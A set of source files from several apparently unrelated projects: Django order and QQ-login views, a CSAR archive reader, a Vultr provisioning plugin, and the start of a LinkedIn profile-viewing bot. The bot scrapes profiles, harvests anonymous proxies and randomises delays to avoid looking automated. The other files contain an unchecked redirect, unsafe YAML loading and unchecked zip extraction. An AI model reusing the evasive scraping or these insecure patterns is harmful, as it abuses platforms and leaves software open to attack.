return http.JsonResponse({
"errno": RET.DBERR,
"errmsg": "保存订单失败"
})
order_id = order_house.id
return http.JsonResponse({
"errno": RET.OK,
"errmsg": "保存订单成功",
"data": {"order_id": order_id}
})
def get(self, request):
"""获取订单"""
json_dict = request.GET
role = json_dict.get('role')
user = request.user
data = dict()
orders_list = []
if role == 'custom':
try:
orders = Order.objects.filter(user_id=user.id)
except Order.DoesNotExist:
return http.JsonResponse({
"errno": RET.DBERR,
"errmsg": "数据不存在"
})
else:
try:
orders = Order.objects.filter(house_id__in=user.house_set.all())
except Order.DoesNotExist:
return http.JsonResponse({
"errno": RET.DBERR,
"errmsg": "数据不存在"
})
for order in orders:
order_dict = dict()
try:
order_dict['amount'] = order.amount
order_dict['comment'] = order.comment
order_dict['ctime'] = order.create_time
order_dict['days'] = order.days
order_dict['end_date'] = order.end_date
order_dict['img_url'] = order.house.index_image_url
order_dict['order_id'] = order.id
order_dict['start_date'] = order.begin_date
order_dict['status'] = order.status
order_dict['title'] = order.house.title
orders_list.append(order_dict)
data["orders"] = orders_list
except Exception as e:
print(e)
return http.JsonResponse({
"errmsg": "数据查询错误",
"errno": RET.DBERR
})
return http.JsonResponse({
"data": data,
"errmsg": "OK",
"errno": RET.OK
})
    # Order processing (accept or reject)
def put(self, request):
json_dict = json.loads(request.body.decode())
action = json_dict.get("action")
order_id = json_dict.get('order_id')
reason = json_dict.get('reason')
if action == 'reject':
try:
order = Order.objects.get(id=order_id)
order.status = Order.ORDER_STATUS_CHOICES[6][0]
order.comment = reason
order.save()
except Exception as e:
print(e)
return http.JsonResponse({
"errmsg": "更新数据失败",
"errno": RET.DBERR
})
else:
try:
order = Order.objects.get(id=order_id)
order.status = Order.ORDER_STATUS_CHOICES[3][0]
order.save()
except Exception as e:
print(e)
return http.JsonResponse({
"errmsg": "更新数据失败",
"errno": RET.DBERR
})
return http.JsonResponse({
"errno": RET.OK,
"errmsg": "OK"
})
class CommentView(View):
"""客户评论"""
def put(self, request):
json_dict = json.loads(request.body.decode())
comment = json_dict.get('comment')
order_id = json_dict.get('order_id')
try:
order = Order.objects.get(id=order_id)
order.status = Order.ORDER_STATUS_CHOICES[4][0]
order.comment = comment
order.save()
except Exception as e:
print(e)
return http.JsonResponse({
"errmsg": "更新数据失败",
"errno": RET.DBERR
})
return http.JsonResponse({
"errno": RET.OK,
"errmsg": "OK"
})
``` |
{
"source": "00wsmart00/meiduo_project_all",
"score": 2
} |
#### File: apps/contents/views.py
```python
from django.shortcuts import render
# Create your views here.
from django.views import View
from contents.models import ContentCategory
from goods.utils import get_categories
class IndexView(View):
"""首页广告"""
def get(self, request):
"""提供首页广告界面"""
# 查询商品频道和分类
categories = get_categories()
# 定义一个空的字典
dict = {}
# 查询出所有的广告类别
content_categories = ContentCategory.objects.all()
# 遍历所有的广告类别, 然后放入到定义的空字典中:
for cat in content_categories:
# 获取类别所对应的展示数据, 并对数据进行排序:
# key:value ==> 商品类别.key:具体的所有商品(排过序)
dict[cat.key] = cat.content_set.filter(status=True).order_by('sequence')
# 拼接参数:
context = {
# 这是首页需要的一二级分类信息:
'categories': categories,
# 这是首页需要的能展示的三级信息:
'contents': dict,
}
# 返回界面, 同时传入参数:
return render(request, 'index.html', context=context)
```
#### File: apps/oauth/views.py
```python
import re
from QQLoginTool.QQtool import OAuthQQ
from django import http
from django.conf import settings
from django.contrib.auth import login
from django.db import DatabaseError
from django.shortcuts import render, redirect
from django_redis import get_redis_connection
# Create your views here.
from django.urls import reverse
from django.views import View
from meiduo_mall.utils.response_code import RETCODE
import logging
from oauth.models import OAuthQQUser
from oauth.utils import generate_access_token, check_access_token
from users.models import User
logger = logging.getLogger('django')
class QQUserView(View):
"""用户扫码登录的回调处理"""
def get(self, request):
"""Oauth2.0认证"""
# 接收Authorization Code
code = request.GET.get('code')
if not code:
return http.HttpResponseForbidden('缺少必传参数')
# 创建工具对象
oauth = OAuthQQ(client_id=settings.QQ_CLIENT_ID,
client_secret=settings.QQ_CLIENT_SECRET,
redirect_uri=settings.QQ_REDIRECT_URI)
try:
# 携带code向qq服务器请求access_token
access_token = oauth.get_access_token(code)
# 携带access_token去请求openid
openid = oauth.get_open_id(access_token)
except Exception as e:
logger.error(e)
return http.HttpResponseForbidden('OAuth2.0认证失败')
# 使用openID去判断用户是否存在
try:
oauth_user = OAuthQQUser.objects.get(openid=openid)
except OAuthQQUser.DoesNotExist:
# 用户不存在
access_token = generate_access_token(openid)
# 拿到access_token,渲染到模板中返回
context = {'access_token': access_token}
return render(request, 'oauth_callback.html', context)
pass
else:
# 用户存在
# 根据外键,获取对应的QQ用户
user = oauth_user.user
# 实现状态保持
login(request, user)
# 创建重定向到首页
response = redirect(reverse('contents:index'))
# 写入cookie,15天
response.set_cookie('username', user.username, max_age=3600*24*15)
# 返回响应
return response
    def post(self, request):
        # Receive the parameters
        mobile = request.POST.get('mobile')
        password = request.POST.get('password')
        sms_code_cli = request.POST.get('sms_code')
        access_token = request.POST.get('access_token')
        # Validate the parameters
        if not all([mobile, password, sms_code_cli]):
            return http.HttpResponseForbidden("缺少必传参数")
        # Check that the mobile number is valid
        if not re.match(r'^1[3-9]\d{9}$', mobile):
            return http.HttpResponseForbidden('手机号格式不匹配')
        # Check that the password is acceptable
        if not re.match(r'^[0-9A-Za-z]{8,20}$', password):
            return http.HttpResponseForbidden('请输入8-20位的密码')
        # Check the SMS verification code
        # Connect to redis
        redis_connection = get_redis_connection('verify_code')
        # Read the sms_code value from redis
        sms_code_server = redis_connection.get('sms_code_%s' % mobile)
        # Was a value found?
        # Not found
        if sms_code_server is None:
            return render(request, 'oauth_callback.html', {'sms_code_errmsg':'无效的短信验证码'})
        # Found
        # Check that the SMS verification codes match
        if sms_code_server.decode() != sms_code_cli:
            return render(request, 'oauth_callback.html', {'sms_code_errmsg': '输入短信验证码有误'})
        # Check that the access_token is valid
        openid = check_access_token(access_token)
        if openid is None:
            return render(request, 'oauth_callback.html', {'openid_errmsg': '无效的openid'})
        # Save the registration data
        try:
            user = User.objects.get(mobile=mobile)
        except User.DoesNotExist:
            # The user does not exist, create a new one
            user = User.objects.create_user(username=mobile, password=password, mobile=mobile)
        else:
            # If the user exists, check the password
            if not user.check_password(password):
                return render(request, 'oauth_callback.html', {'account_errmsg': '用户名或密码错误'})
        # Bind the user to the openid
        try:
            OAuthQQUser.objects.create(openid=openid, user=user)
        except DatabaseError:
            return render(request, 'oauth_callback.html', {'qq_login_errmsg': 'QQ登录失败'})
        # Keep the login state
        login(request, user)
        # Respond with the binding result
        next = request.GET.get('state')
        response = redirect(next)
        # Write the username cookie at login, valid for 15 days
        response.set_cookie('username', user.username, max_age=3600 * 24 * 15)
        # Return the response
        return response
class QQURLView(View):
"""提供QQ登录页面网址
https://graph.qq.com/oauth2.0/authorize?
response_type=code&
client_id=xxx&
redirect_uri=xxx&
state=xxx
"""
def get(self, request):
        # next records which page led to the login page
next = request.GET.get('next')
        # Build the QQ login page URL
        # Create an OAuthQQ instance
oauth = OAuthQQ(client_id=settings.QQ_CLIENT_ID,
client_secret=settings.QQ_CLIENT_SECRET,
redirect_uri=settings.QQ_REDIRECT_URI,
state=next)
        # Call the method that returns the QQ login URL
login_url = oauth.get_qq_url()
return http.JsonResponse({
'code': RETCODE.OK,
'errmsg': 'OK',
'login_url': login_url
})
``` |
{
"source": "01000101/aria-csar-extension",
"score": 2
} |
#### File: aria-csar-extension/nfvo_packager/reader.py
```python
import logging
import os
from shutil import rmtree
from glob import glob
from tempfile import mkstemp, mkdtemp
import mimetypes
import hashlib
from base64 import b64decode
from pprint import pformat
import zipfile
import yaml
import requests
from nfvo_packager import constants
logging.basicConfig(level=logging.DEBUG)
class CSARReader(object):
'''
TOSCA Cloud Service Archive (CSAR) reader. This class
is a helper for reading, validating, and extracting information
from CSAR v1.1 ZIP files (locally or remotely).
'''
def __init__(self, source, is_external=False, logger=None):
self.log = logger or logging.getLogger('csar.reader')
self.log.debug('CSARReader(%s, %s)', source, is_external)
self.csar = {
'source': source,
'external': is_external,
'local': None,
'destination': None,
'metadata': None,
'artifacts': None
}
self._retrieve()
self._extract()
self._validate()
def __del__(self):
'''
Deletes temporary files and folders
'''
if self.csar.get('local') and \
self.csar.get('source') and \
self.csar['local'] != os.path.normpath(self.csar['source']) and \
os.path.isfile(self.csar['local']):
self.log.debug('Removing temporary file: %s', self.csar['local'])
os.remove(self.csar['local'])
if self.csar.get('destination') and \
os.path.isdir(self.csar['destination']):
self.log.debug('Removing temporary directory: %s',
self.csar['destination'])
rmtree(self.csar['destination'])
@property
def has_metadata_file(self):
'''Returns True if a metadata file exists'''
return os.path.isfile(os.path.join(self.path, constants.META_FILE))
@property
def metadata(self):
'''Returns CSAR metadata'''
return self.csar.get('metadata', dict())
@property
def artifacts(self):
'''Returns CSAR artifacts'''
return self.metadata.get('artifacts', dict())
@property
def path(self):
'''Returns the root (extracted) CSAR directory path'''
return self.csar.get('destination')
@property
def author(self):
'''Returns the CSAR package author'''
return self.metadata.get(constants.META_CREATED_BY_KEY) or \
self.metadata.get(constants.META_TMPL_AUTHOR_KEY)
@property
def version(self):
'''Returns the CSAR version'''
return self.metadata.get(constants.META_CSAR_VERSION_KEY) or \
self.metadata.get(constants.META_TMPL_VERSION_KEY)
@property
def metadata_file_version(self):
'''Returns the CSAR metadata file version'''
return self.metadata.get(constants.META_FILE_VERSION_KEY)
@property
def template_name(self):
'''Returns the CSAR template name'''
return self.metadata.get(constants.META_TMPL_NAME_KEY)
@property
def entry_definitions(self):
'''Returns the Entry-Definitions (relative) path'''
return self.metadata.get(constants.META_ENTRY_DEFINITIONS_KEY)
@property
def entry_definitions_yaml(self):
'''Returns the TOSCA entry definitions YAML contents'''
with open(os.path.join(self.path,
self.entry_definitions), 'r') as mfile:
return yaml.load(mfile)
return dict()
def _retrieve(self):
'''
Fetches a CSAR package (remote or local)
'''
if not self.csar['external']:
self.log.debug('CSAR is local; normalizing path')
self.csar['local'] = os.path.normpath(self.csar['source'])
self.log.debug('CSAR local path is: %s', self.csar['local'])
return
# Get a temporary file
self.log.debug('Generating temporary file')
tmp_hndl, tmp_filename = mkstemp()
self.log.debug('Temporary file is: %s', tmp_filename)
# Download the archive
self.log.debug('Starting remote CSAR download')
req = requests.get(self.csar['source'], stream=True)
for chunk in req.iter_content(chunk_size=1024):
if chunk:
os.write(tmp_hndl, chunk)
self.log.debug('Remote CSAR downloaded; closing temporary file')
os.close(tmp_hndl)
# Update the CSAR definition
self.csar['local'] = tmp_filename
def _extract(self):
'''
Extracts a CSAR package
'''
if not self.csar['local']:
raise RuntimeError('Missing CSAR file')
if not zipfile.is_zipfile(self.csar['local']):
raise RuntimeError('CSAR file is not in ZIP format')
# Get a temporary directory to use
self.log.debug('Generating temporary directory')
tmp_dirname = mkdtemp()
self.log.debug('Temporary directory is: %s', tmp_dirname)
# Extract ZIP file to temporary directory
self.log.debug('Extracting CSAR contents')
zfile = zipfile.ZipFile(self.csar['local'])
zfile.extractall(tmp_dirname)
self.log.debug('CSAR contents successfully extracted')
# Update the CSAR definition
self.csar['destination'] = tmp_dirname
def _validate(self):
'''
Validates a CSAR package
'''
csar_root = self.csar.get('destination')
# Check for a CSAR contents folder
if not csar_root or not os.path.isdir(csar_root):
raise RuntimeError('Missing CSAR contents')
# Validate metadata
if self.has_metadata_file:
self._validate_metadata_file()
else:
self._validate_metadata_inline()
# Validate entry definitions
self._validate_entry_definitions()
# Validate artifacts
self._validate_artifacts()
def _validate_metadata_file(self):
'''
Validates CSAR metadata file
'''
# Check for metadata
csar_metafile = os.path.join(self.path, constants.META_FILE)
self.log.debug('CSAR metadata file: %s', csar_metafile)
# Check the expected files/folders exist
if not csar_metafile or not os.path.isfile(csar_metafile):
raise RuntimeError('Missing CSAR metadata file')
# Validate metadata YAML
metadata = dict()
self.log.debug('Attempting to parse CSAR metadata YAML')
with open(csar_metafile, 'r') as mfile:
metadata = yaml.load(mfile)
self.log.debug('CSAR metadata:\n%s', pformat(metadata))
# Validate metadata specification
if constants.META_FILE_VERSION_KEY not in metadata:
raise RuntimeError('Missing metadata "%s"' %
constants.META_FILE_VERSION_KEY)
if str(metadata[constants.META_FILE_VERSION_KEY]) != '1.0':
raise RuntimeError('Metadata "%s" must be 1.0' %
constants.META_FILE_VERSION_KEY)
if constants.META_CSAR_VERSION_KEY not in metadata:
raise RuntimeError('Missing metadata "%s"' %
constants.META_CSAR_VERSION_KEY)
if str(metadata[constants.META_CSAR_VERSION_KEY]) != '1.1':
raise RuntimeError('Metadata "%s" must be 1.1' %
constants.META_CSAR_VERSION_KEY)
if constants.META_CREATED_BY_KEY not in metadata or \
not metadata[constants.META_CREATED_BY_KEY]:
raise RuntimeError('Missing metadata "%s"' %
constants.META_CREATED_BY_KEY)
if constants.META_ENTRY_DEFINITIONS_KEY not in metadata or \
not metadata[constants.META_ENTRY_DEFINITIONS_KEY]:
raise RuntimeError('Missing metadata "%s"' %
constants.META_ENTRY_DEFINITIONS_KEY)
# Update the CSAR definition
self.csar['metadata'] = metadata
def _validate_metadata_inline(self):
'''
Validates CSAR inline metadata
'''
# Get a list of all definition files in the root folder
root_defs = list()
self.log.debug('Searching for TOSCA template file with metadata')
for ext in ['yaml', 'yml']:
root_defs.extend(glob('%s/*.%s' % (self.path, ext)))
# Make sure there's only one
        if len(root_defs) != 1:
raise RuntimeError(
'Exactly 1 YAML file must exist in the CSAR root directory')
# Validate metadata YAML
def_data = dict()
self.log.debug('Attempting to parse CSAR metadata YAML')
with open(root_defs[0], 'r') as def_file:
def_data = yaml.load(def_file)
# Validate metadata specification
metadata = def_data.get('metadata')
if not metadata:
raise RuntimeError('Missing metadata section')
if constants.META_TMPL_VERSION_KEY not in metadata:
raise RuntimeError('Missing metadata "%s"' %
constants.META_TMPL_VERSION_KEY)
if str(metadata[constants.META_TMPL_VERSION_KEY]) != '1.1':
raise RuntimeError('Metadata "%s" must be 1.1' %
constants.META_TMPL_VERSION_KEY)
if constants.META_TMPL_AUTHOR_KEY not in metadata or \
not metadata[constants.META_TMPL_AUTHOR_KEY]:
raise RuntimeError('Missing metadata "%s"' %
constants.META_TMPL_AUTHOR_KEY)
if constants.META_TMPL_NAME_KEY not in metadata or \
not metadata[constants.META_TMPL_NAME_KEY]:
raise RuntimeError('Missing metadata "%s"' %
constants.META_TMPL_NAME_KEY)
# Update the CSAR definition
metadata[constants.META_ENTRY_DEFINITIONS_KEY] = root_defs[0]
self.csar['metadata'] = metadata
def _validate_entry_definitions(self):
'''
Validates entry definitions
'''
self.log.debug('CSAR entry definitions: %s', self.entry_definitions)
if not self.has_metadata_file:
self.log.debug('Using inline metadata; skipping...')
return
if not os.path.isfile(os.path.join(self.path,
self.entry_definitions)):
raise RuntimeError('"%s" points to "%s", but the file '
'does not exist' % (
constants.META_ENTRY_DEFINITIONS_KEY,
self.entry_definitions))
def _validate_artifacts(self):
'''
Validates artifacts
'''
self.log.debug('Searching for user-defined MIME types')
mtypes = glob(os.path.join(self.path, constants.META_MIMETYPES_GLOB))
self.log.debug('Loading %s user-defined MIME types', len(mtypes))
mimetypes.init(mtypes or None)
self.log.debug('Checking for artifacts')
if not self.artifacts:
self.log.debug('No artifacts declared')
return
# Iterate through each artifacts
for name, artifact in self.artifacts.iteritems():
self._validate_artifact(name, artifact)
def _validate_artifact(self, name, artifact):
'''
Validates a single artifact
'''
self.log.debug('Validating artifact: %s', name)
self.log.debug('Checking if artifact file exists')
path = os.path.join(self.path, name)
if not os.path.isfile(path):
raise RuntimeError('Artifact "%s" delcared, but file does '
'not exist' % name)
# Validate the content-type
if 'content-type' not in artifact:
raise RuntimeError('Artifact missing "content-type"')
self.log.debug('Artifact content-type: %s', artifact['content-type'])
tstype = artifact['content-type'].split('/')
if len(tstype) < 2:
raise RuntimeError('Artifact content-type must comply with the '
'"type/subtype" structure')
if not tstype[-1].startswith('vnd.'):
self.log.warn('Artifact content-type subtype should start '
'with "vnd."')
# Validate content-type as a known MIME type
self.log.debug('Checking content-type against known MIME types')
if len([{x: y} for x, y in mimetypes.types_map.iteritems()
if y == artifact['content-type']]) < 1:
self.log.warn('Could not match artifact content-type '
'with any known MIME type')
# Validate the artifact MIME type against the content-type
self.log.debug('Checking artifact MIME type against content-type')
mtype = mimetypes.guess_type(path)[0]
if mtype is None:
self.log.warn('Could not match artifact to a known MIME type')
if mtype != artifact['content-type']:
self.log.warn('Artifact content-type does not match the '
                          'artifact\'s MIME type')
# Validate the signature / digest
if 'signature' in artifact:
sig = artifact['signature']
algo = sig.get('algorithm')
digest = sig.get('digest')
if not algo:
raise RuntimeError(
                    'Artifact signature declared, but no algorithm was found')
if not digest:
raise RuntimeError(
                    'Artifact signature declared, but no digest was found')
# Decode base64 encoded digest
self.log.debug('Decoding base64-encoded artifact digest')
digest = b64decode(digest).strip()
self.log.debug('Decoded artifact digest: %s', digest)
# Calculate hash of the actual artifact
self.log.debug('Calculating %s digest of artifact %s', algo, name)
adigest = hashlib.new(algo, open(path, 'rb').read()).hexdigest()
self.log.debug('Calculated artifact digest: %s', adigest)
# Compare digests
if digest != adigest:
raise RuntimeError('Artifact digest mismatch')
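# Hedged usage sketch: reading a local CSAR archive. The file name below is
# illustrative only; any CSAR v1.1 ZIP with a TOSCA.meta or inline metadata works.
def _example_read_local_csar(path='example-service.csar'):
    reader = CSARReader(path, is_external=False)
    print('Author:   %s' % reader.author)
    print('Version:  %s' % reader.version)
    print('Template: %s' % reader.template_name)
    return reader.entry_definitions_yaml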
``` |
{
"source": "01000101/cloudify-vultr-plugin",
"score": 2
} |
#### File: cloudify-vultr-plugin/plugin/instance.py
```python
from cloudify import ctx
from cloudify.exceptions import NonRecoverableError, RecoverableError
from cloudify.decorators import operation
from vultr import Vultr, VultrError
def _helper_get_vultr_api_key():
'''Gets the Vultr API key for use in all Vultr API calls'''
    return '<KEY>'
def _helper_get_vultr_client():
'''Returns a connected Vultr API client'''
try:
return Vultr(_helper_get_vultr_api_key())
except VultrError:
raise NonRecoverableError(
'Connection to Vultr API failed. '
'Incorrect / Invalid API key provided.')
def _helper_get_existing_server(client, resource_id):
'''Returns a JSON object for an existing server'''
if (not client) or (not resource_id):
return None
return client.server_list(resource_id)
def provision_server(client, opts):
'''Provisions a new server on the provider'''
_err = False
if not opts.get('vps_plan_id'):
_err = True
ctx.logger.error('Missing VPSPLANID (Subscription Plan) '
'from the node properties')
if not opts.get('os_id'):
_err = True
ctx.logger.error('Missing OSID (Image) from the node properties')
if not opts.get('dc_id'):
_err = True
ctx.logger.error('Missing DCID (Location) from the node properties')
if _err:
        raise NonRecoverableError('Missing required node properties')
ctx.logger.info('\nProvisioning new server with properties:\n'
'{0}' . format(opts))
try:
result = client.server_create(
opts.get('dc_id'),
opts.get('vps_plan_id'),
opts.get('os_id'),
label=opts.get('label'),
sshkeyid=opts.get('ssh_key_id')
)
except VultrError, ex:
ctx.logger.error('Exception: {0}' . format(ex))
        raise RecoverableError('Could not create the server')
return result.get('SUBID')
def server_is_active(client, sub_id):
'''Checks if a Vultr server is active or not'''
instance = _helper_get_existing_server(client, sub_id)
if instance:
if instance.get('status', '') == 'active':
if instance.get('server_state', '') == 'ok':
return True
return False
@operation
def run_instances(**_):
'''This actually creates the Vultr server'''
client = _helper_get_vultr_client()
cfy_agent = ctx.node.properties.get('cloudify_agent', dict())
bs_cfy_agent = ctx.bootstrap_context.cloudify_agent
cfy_user = cfy_agent.get('user', bs_cfy_agent.user)
cfy_key = cfy_agent.get('key', bs_cfy_agent.agent_key_path)
ctx.logger.info('BootstrapContext.cloudify_agent: {0}'
. format(vars(bs_cfy_agent)))
ctx.logger.info('SSH User: {0}, Key: {1}'
. format(cfy_user, cfy_key))
# Get the Vultr SUBID (indicating that we're using an existing resource)
sub_id = ctx.node.properties.get('SUBID')
if sub_id:
ctx.logger.info('Using SUBID: {0}' . format(sub_id))
# Get the server information (if it exists)
server = _helper_get_existing_server(client, sub_id)
if server:
ctx.logger.info('Vultr server: {0}' . format(server))
# External resource doesn't exist when it's supposed to
if sub_id and not server:
raise NonRecoverableError(
'External resource, but the supplied '
'server SUBID is not in the account.')
# External resource exists when it's not supposed to
if not sub_id and server:
raise NonRecoverableError(
'Not external resource, but the supplied '
'but the server already exists.')
# External resource information dump
if sub_id:
ctx.logger.info(
'\nExternal resource:\n'
' Label: {0}\n'
' SUBID: {1}\n'
' OS: {2}\n'
' vCPUs: {3}\n'
' RAM: {4}\n'
' DISK: {5}\n'
' Location: {6}\n'
' IP: {7}'
. format(
server['label'],
server['SUBID'],
server['os'],
server['vcpu_count'],
server['ram'],
server['disk'],
server['location'],
server['main_ip']
)
)
ctx.instance.runtime_properties['ip'] = server['main_ip']
return
else:
if ctx.operation.retry_number == 0:
extra_opts = ctx.node.properties.get('CONFIG', dict())
# Actually request the server be created
sub_id = provision_server(
client,
{
'vps_plan_id': ctx.node.properties.get('VPSPLANID'),
'os_id': ctx.node.properties.get('OSID'),
'dc_id': ctx.node.properties.get('DCID'),
'label': extra_opts.get('label'),
'ssh_key_id': extra_opts.get('SSHKEYID')
}
)
if not sub_id:
                raise NonRecoverableError(
'Unable to provision a new server. '
'Provider did not issue a SUBID.'
)
ctx.instance.runtime_properties['SUBID'] = sub_id
else:
sub_id = ctx.instance.runtime_properties.get('SUBID')
if server_is_active(client, sub_id):
ctx.logger.info('Server has been provisioned '
'with SUBID {0}' . format(sub_id))
server = _helper_get_existing_server(client, sub_id)
ctx.instance.runtime_properties['ip'] = \
server.get('main_ip')
ctx.logger.info('Server Information:\n{0}' . format(server))
ctx.logger.info('Runtime properties:\n{0}'
. format(ctx.instance.runtime_properties))
ctx.logger.info('Properties:\n{0}'
. format(ctx.node.properties))
return
return ctx.operation.retry(
message='Waiting for server {0} to be '
'added to your account.' . format(sub_id))
@operation
def stop(**_):
'''Terminates all existing Vultr servers'''
client = _helper_get_vultr_client()
sub_id = ctx.instance.runtime_properties.get('SUBID')
if not sub_id:
return
ctx.logger.info('Attempting to destroy server SUBID={0}'
. format(sub_id))
try:
res = client.server_destroy(sub_id)
ctx.logger.info('Result: {0}' . format(res))
except VultrError, ex:
ctx.logger.error('Exception: {0}' . format(ex))
return ctx.operation.retry(
message='Waiting to destroy server {0}. '
'(note: you cannot destroy Vultr servers within '
'5 minutes of creation)'
. format(sub_id))
``` |
{
"source": "01000101/LinkedIn-Viewer-Bot",
"score": 3
} |
#### File: 01000101/LinkedIn-Viewer-Bot/bot.py
```python
import logging
import json
import codecs
from random import randint, shuffle
from time import sleep
from pprint import pformat
from lxml import html
import urllib3
from requests import Session
from requests.adapters import HTTPAdapter
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
logging.basicConfig(level=logging.DEBUG)
logging.getLogger('requests.packages.urllib3').setLevel(logging.WARNING)
logging.getLogger('selenium.webdriver.remote').setLevel(logging.WARNING)
# Authentication
LINKEDIN_USERNAME = ''
LINKEDIN_PASSWORD = ''
# Configuration
LINKEDIN_SEARCH_TERMS = ['technical recruiter', 'engineering recruiter']
LINKEDIN_START_PROFILES = []
# Connection
USER_AGENT = 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) ' \
'Gecko/20100101 Firefox/34.0'
LINKEDIN_PROFILE_URL = 'https://www.linkedin.com/in/'
# Public profile
X_PROFILE_NAME = \
'//div[@class="profile-overview-content"]' \
'//h1[@id="name"]/text()'
# Public profile experiences
X_PROFILE_EXPERIENCES = '//section[@id="experience"]/ul/li'
X_EXPERIENCE_TITLE = './/header/h4[@class="item-title"]//text()'
X_EXPERIENCE_COMPANY = './/header/h5[@class="item-subtitle"]//text()'
# Public profile suggestions
X_PROFILE_SUGGESTIONS = \
'//div[@id="aux"]//div[@class="browse-map"]' \
'/ul/li[contains(@class, "profile-card")]'
X_SUGGESTION_NAME = './div[@class="info"]/h4[@class="item-title"]/a/text()'
X_SUGGESTION_URL = './div[@class="info"]/h4[@class="item-title"]/a/@href'
X_SUGGESTION_HEADLINE = './div[@class="info"]/p[@class="headline"]/text()'
# GatherProxy XPaths
P_GP_PROXIES = '//table[@id="tblproxy"]/tr'
def _single(arr):
'''Returns the first array item or None'''
return arr[0] if len(arr) > 0 else None
def find_by_xpath(driver, xpath):
'''Finds an element by XPATH'''
return WebDriverWait(driver, 10).until(
EC.presence_of_element_located((By.XPATH, xpath)))
def authenticate(driver):
'''Starts an authenticated session'''
driver.get('https://www.linkedin.com/uas/login')
find_by_xpath(driver, '//input[@name = "session_key"]').send_keys(
LINKEDIN_USERNAME)
find_by_xpath(driver, '//input[@name = "session_password"]').send_keys(
LINKEDIN_PASSWORD)
find_by_xpath(driver, '//input[@id = "btn-primary"]').click()
sleep(2)
class ProxyCrawler(object):
'''
    Crawls proxy list websites to harvest usable proxies
'''
def __init__(self):
self.log = logging.getLogger('linkedout.proxy')
self.proxies = self.crawl_gatherproxy()
def crawl_gatherproxy(self):
'''Scrape GatherProxy for proxies'''
baseurl = 'http://gatherproxy.com/'
searchurl = baseurl + 'proxylist/anonymity/?t=Elite'
searchpage = 1
session = self.get_session_connection(baseurl)
proxies = list()
# Search
for searchpage in range(1, 3):
self.log.debug('Fetching GatherProxy proxy list')
self.log.debug('| page: %s', searchpage)
res = session.request(
url=searchurl,
method='post',
data='Type=elite&PageIdx=%s&Uptime=0' % (searchpage),
headers={
'Content-Type': 'application/x-www-form-urlencoded'
})
self.log.debug('|_status code: %s', res.status_code)
if res.status_code is not 200:
return None
# Set up for XPath
tree = html.fromstring(res.text)
# Close our session
session.close()
# Find the person's name
proxy_rows = tree.xpath(P_GP_PROXIES)[2:]
for proxy_row in proxy_rows:
raw_cols = proxy_row.xpath('./td/text()')
proxy_cols = proxy_row.xpath('./td/script/text()')
proxies.append({
'ip': proxy_cols[0].replace(
'document.write(\'', '').replace('\')', ''),
'port': int(proxy_cols[1].replace(
'document.write(gp.dep(\'', '').replace(
'\'))', ''), 16),
'location': raw_cols[2],
'speed': int(raw_cols[5].replace('ms', ''))
})
self.log.debug('Proxies: %s', pformat(proxies))
@staticmethod
def get_session_connection(baseurl):
'''
Creates a `requests.Session` instance
and includes basic connection fault tolerance.
:returns: A configured requests.Session instance
:rtype: :class:`requests.Session`
'''
# Build a session object with some fault tolerance
# Retry up to 10 times with increasing backoff time
# up to 120 seconds.
session = Session()
session.mount(
baseurl,
HTTPAdapter(
max_retries=urllib3.util.Retry(
total=10,
backoff_factor=0.4,
status_forcelist=[500, 501, 502, 503, 504]
)))
session.headers = {
'User-Agent': USER_AGENT
}
return session
class LinkedInCrawler(object):
'''
    Helper to crawl public LinkedIn pages,
    acting as a spider that collects information
    about profiles to feed to a viewer instance.
:param list terms: List of search terms to crawl
:param bool public: True for public profiles,
False for authenticated / private profiles
'''
def __init__(self, terms=None, public=True):
self.log = logging.getLogger('linkedout.crawler')
self.terms = [x.lower() for x in terms or list()] or None
self.public = public
self._active_list = list()
def build_profile_list(self, profile_urls, depth=1):
'''
Builds a list of public profile information
based on recursive suggestion searches
:param list profile_urls: List of public profiles to crawl from
:param int depth: Suggestions crawl depth
:returns: List of profiles
:rtype: list
'''
self._active_list = list()
people = list()
# Normalize types
if isinstance(profile_urls, basestring):
profile_urls = [profile_urls]
# Crawl profiles
for profile_url in profile_urls:
people.extend(self._build_profile_list(profile_url, depth))
# Remove empty items and return
return [x for x in people if x is not None]
def _build_profile_list(self, profile_url, depth=1):
'''Worker for build_profile_list()'''
self.log.debug('build_profile_list(%s, %s)',
profile_url, depth)
active = self.parse_public_profile(profile_url)
if not active:
return list()
# Redundancy check list
self._active_list.append(active.get('name'))
self.log.debug('Active list: %s', self._active_list)
people = [active]
if depth:
for suggestion in active.get('suggestions', list()):
sname = suggestion.get('name')
if not sname:
self.log.warn('A suggestion has no name')
continue
# Check that there's a profile URL
if not suggestion.get('url'):
self.log.warn('Suggestion "%s" missing URL', sname)
continue
# Check that we're not repeating ourselves
if suggestion.get('name') in set(self._active_list):
self.log.warn('Suggestion "%s" already crawled', sname)
continue
# Weed out profiles that don't match the terms set
if not suggestion.get('headline'):
self.log.warn('Suggestion "%s" has no headline', sname)
continue
headline = suggestion.get('headline', '').lower()
if self.terms and \
len([x for x in self.terms if x in headline]) < 1:
self.log.warn('Suggestion "%s" doesn\'t match terms set',
sname)
continue
# Act totally not like a Python bot
sleep(randint(1, 10))
# Enter recursion hell
people.extend(self._build_profile_list(
suggestion['url'],
depth=depth-1))
return people
def parse_public_profile(self, profile_url):
'''
Parses a public user profile for key
properties (name, experience, etc...)
:returns: Profile information
:rtype: dict
'''
session = self.get_session_connection()
person = dict()
# Normalize profile link
if not profile_url.startswith(LINKEDIN_PROFILE_URL):
profile_url = LINKEDIN_PROFILE_URL + profile_url
self.log.debug('Fetching public profile')
self.log.debug('| url: %s', profile_url)
self.log.debug('| method: GET')
# Request the page
res = session.request(url=profile_url, method='get')
self.log.debug('|_status code: %s', res.status_code)
        if res.status_code != 200:
return None
# Set up for XPath
tree = html.fromstring(res.text)
# Close our session
session.close()
# Save the person's profile link
person['url'] = profile_url
# Find the person's name
person['name'] = _single(tree.xpath(X_PROFILE_NAME))
# Find experience
person['experiences'] = list()
for experience in tree.xpath(X_PROFILE_EXPERIENCES):
person['experiences'].append({
'title': _single(experience.xpath(X_EXPERIENCE_TITLE)),
'company': _single(experience.xpath(X_EXPERIENCE_COMPANY)),
'date': {
'start': _single(experience.xpath('.//time[1]/text()')),
'end': _single(experience.xpath('.//time[2]/text()'))
}
})
# Find suggested profiles
person['suggestions'] = list()
for suggestion in tree.xpath(X_PROFILE_SUGGESTIONS):
url = _single(suggestion.xpath(X_SUGGESTION_URL))
if url:
url = url.split('?')[0]
